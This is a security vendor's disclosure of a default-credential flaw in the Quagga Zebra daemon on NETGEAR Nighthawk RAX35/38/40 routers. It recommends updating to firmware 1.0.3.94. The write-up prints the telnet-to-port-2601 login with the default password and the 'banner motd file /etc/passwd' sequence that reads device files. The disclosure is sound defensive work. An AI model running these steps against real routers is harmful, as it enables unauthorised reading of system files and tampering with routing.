VerSprite Finds Vulnerability in NETGEAR Nighthawk WiFi Router

VerSprite’s Security Research team found a vulnerability within the NETGEAR Nighthawk WiFi Router line. This vulnerability is considered high-risk and should be patched using the instructions on the vendor’s website.

NETGEAR Vulnerability Analysis

VerSprite’s VS-Labs Security Research team found a High-Risk vulnerability affecting NETGEAR Nighthawk 4-Stream Dual-Band WiFi 6 Router (Models RAX35, RAX38, RAX40), that could leave consumer’s data unprotected against attacks via the Local Area Network (LAN). NETGEAR is a computer networking company that produces networking hardware for consumers and businesses worldwide. This means their vast attack surface has the potential to leave an untold number of consumers exposed. Notably, as of May 19, 2021, NETGEAR released a set of security updates. The latest available firmware for the NETGEAR Nighthawk line is 1.0.3.94 and can be downloaded directly from the NETGEAR website.

VS-Labs researchers found this vulnerability within a default configuration file of the third-party networking software, QUAGGA, that is utilized by the ZEBRA daemon. The default configuration uses an automatically generated password (zebra) for authentication to the privileged ZEBRA daemon via local port “2601” over telnet. Attackers who abuse the vulnerability can chain the vulnerability of initial access to another vulnerability within the actual ZEBRA daemon to achieve a controlled read of any file on the device.

Throughout this vulnerability analysis report, you will see the VS-Labs Security Research team’s analysis on how they uncovered the NETGEAR vulnerability within the privileged third-party networking suite, QUAGGA. This is a high-risk vulnerability that give attackers the ability to leak consumer data and potentially control network routing information from the Local Area Network (LAN). If you or your organization use these routers, use the instructions and link in the Conclusion section to get the patch.

QUAGGA and ZEBRA Daemon Analysis

At its core, QUAGGA is a network routing software suite that supports many different protocols such as OSPF, RIP, and BGP. QUAGGA is utilized to modify, change, and add new interface/routing table configurations to a device. Access to these core functions is what makes QUAGGA enticing to a malicious actor.

Within QUAGGA, the ZEBRA daemon is an appealing attack surface because the daemon exposes an active telnet session via port 2601. This telnet session is wrapped within a VTY shell, where attackers have a large array of potential abuse cases.

Along with exposing an active telnet session, ZEBRA maintains a configuration file that is normally located on disk at the fold location, /etc/quagga/zebra.conf. This file is the configuration file that is feed into the ZEBRA daemon, and it also holds information such as the password for authentication to the ZEBRA telnet port exposed on port 2601. An example of the contents within a ZEBRA configuration file is below.

ZEBRA Configuration Password Example
test@test:~/squashfs-root$ cat ./etc/quagga/zebra.conf
password zebra

Examining the QUAGGA and ZEBRA Daemon Vulnerability in NETGEAR’s Nighthawk
VS-Labs researchers performed a simple port scan of a network and looked at all connected devices and see if any ports such as 2601 are exposed. If this port is exposed, an attacker can use the normal “telnet” command to establish a telnet session to the ZEBRA daemon and is outlined in the column below.
Initial ZEBRA Prompt
test@z:/mnt/c/Users/VS-Labs$ telnet 10.0.0.1 2601
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.

Hello, this is Quagga (version 0.99.20).
Copyright 1996-2005 Kunihiro Ishiguro, et al.
User Access Verification

Password:
example>
test@z:/mnt/c/Users/VS-Labs$ telnet 10.0.0.1 2601
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.

Hello, this is Quagga (version 0.99.20).
Copyright 1996-2005 Kunihiro Ishiguro, et al.
User Access Verification

Password:
example>

Using the information outlined in the previous section, our research team discovered that the default password of zebra could be located within an embedded device ZEBRA daemon configuration file. Using zebra presented a new terminal where the key ? will print out information about potential commands for our disposal.
Default ZEBRA Terminal Commands
Hello, this is Quagga (version 0.99.20).
Copyright 1996-2005 Kunihiro Ishiguro, et al.

User Access Verification

Password:
example>
echo      Echo a message back to the vty
enable    Turn on privileged mode command
exit      Exit current mode and down to previous mode
help      Description of the interactive help system
list      Print command list
quit      Exit current mode and down to previous mode
show        Show running system information
terminal  Set terminal line parameters
who         Display who is on vty
example>


Enabling Privileged Mode Command on NETGEAR’s Nighthawk Router
When reviewing the default commands exposed upon authentication into the ZEBRA telnet session, a single command stands out the most. This command is enable, and our research team found it interesting because it enables privileged mode command.
When this command is executed, the terminal changes from a > to a “#” character and a new list of commands are presented. These commands are included in the table below.
Privileged mode; enabled
example> enable
example #
clear      Reset functions
configure  Configuration from vty interface
copy       Copy configuration
debug      Debugging functions (see also 'undebug')
disable    Turn off privileged mode command
echo       Echo a message back to the vty
end        End current mode and change to enable mode.
exit       Exit current mode and down to previous mode
help       Description of the interactive help system
list       Print command list
logmsg     Send a message to enabled logging destinations
no         Negate a command or set its defaults
quit       Exit current mode and down to previous mode
show       Show running system information
terminal   Set terminal line parameters
who        Display who is on vty
write      Write running configuration to memory, network, or terminal
example #


When reviewing the new commands and the associated help text next to them, the configure command was appealing to our researchers. They explored this option by entering the configure command by itself. However, they were presented with the error below.
Command Error: Configure
example# configure
% Command incomplete.


To fix this, our research team placed a ? key after they typed out configure. This will tell the terminal to provide the available sub options for the command.
In this event, our team was presented with the terminal sub option. Through entering configure terminal in the terminal, the config option is selected, and new commands were presented. A variety of commands such as write, show, service, log, and banner are available .
The banner command is the most relevant command in scope for this blog post because an our team can abuse this command for a primitive when it comes to attacking embedded devices that use QUAGGA.
When reviewing the detailed information next to the banner command, our research team needed to specify a specific type of banner string to be presented to the user in some manner. When navigating to this command and enumerating the sub options, the research team found an exposed sub option, motd.
Exposing the MOTD
The banner command exposes the sub option motd, which is responsible for displaying the Strings for the message of the day (motd). When enumerating this sub option, two more sub options are found, and they are either default or file. When going through this process, the file sub option looked more promising to our researchers as they could provide a Banner from a file to be displayed as the motd. With their full command now entered, though could then provide a final ? key at the end and the terminal will display the syntax for executing this command, as seen in the table below.
Setting /etc/passwd as the motd file
RAX35(config)# banner motd file /etc/passwd
RAX35(config)# exit


At this point, our researchers know they can modify the motd  using any potential file on the device (if the ZEBRA daemon has permissions to read said file). Similarly, this is where things should start clicking as an attacker.
The entire idea behind the motd is to provide a banner string to any user who tries to connect to the ZEBRA telnet session that is active on port 2601. An attacker who gets access to the ZEBRA telnet session could leak sensitive information from the device via this simple, yet subtle, bug in QUAGGA.
Finding the NETGEAR Vulnerability
Next is applying the knowledge gathered regarding QUAAGA’s ZEBRA daemon and the potential abuse case for the banner motd file command to the NETGEAR Nighthawk Wifi Router line, Models RAX35, RAX38, and RAX40.
The VerSprite VS-Labs Research team found the initial discovery by performing a common port scan using nmap. After discovering the open ports, initial research led to online resources describing what ZEBRA was and how to connect to the daemon via telnet. Our team found the configuration file located within /etc/quagga/zebra.conf by reading the documentation online.
Since they were looking at an embedded device, VS-Labs decided to pull down the latest online firmware and use binwalk to extract the file system. After extracting the file system, they navigated to the ZEBRA configuration file and looked at the assigned password. As predicted, it was ZEBRA.
Proof of Concept
The following table and screenshot demonstrate this vulnerability within QUAGGA’s ZEBRA banner motd file command component and read the coveted /etc/passwd file from the device.
The above shows the output of passing /etc/passwd to the banner motd file command, where it is clearly visible that upon connecting to the ZEBRA daemon, via port 2601, the contents of the /etc/passwd file are displayed to the attacker.
Conclusions and Patches
In today’s world, there is a continuous push for internet connectivity for consumers around the globe. Due to this demand, it is imperative for companies to ensure their devices are secure to protect the growing population using their products.
As shown by our researcher exploiting this vulnerability, using default passwords for privileged daemons, that are accessible via the LAN, can put consumers at risk. These privileged daemons provide attackers immense capabilities, such as being able to potentially control consumer traffic, rerouting them to malicious servers, or the power to read any file on the device, potentially harvesting consumers private information.
To combat these attacks, VerSprite’s VS-Labs Security Research team recommends consumers continuously monitor updates for their external internet-facing devices and apply them when necessary. This will help protect consumers from attacks where the initial foothold into a network is the router. If you use the Nighthawk router (Models RAX35, RAX38, RAX40), download the latest firmware version 1.0.3.94 directly from the NETGEAR website. If you think your network may have been compromised, contact our team to help at [email protected].
VerSprite Security Research Team
Maintain awareness regarding unknown threats to your products, technologies, and enterprise networks. Organizations that are willing to take the next step in proactively securing their flagship product or environment can leverage our zero-day vulnerability research offering. Our subscription-based capability provides your organization with immediate access to zero-day vulnerabilities affecting products and software. Learn More →


View our security advisories detailing vulnerabilities found in major products for MacOs, Windows, Android, and iOS.


View Advisories


							

    
Share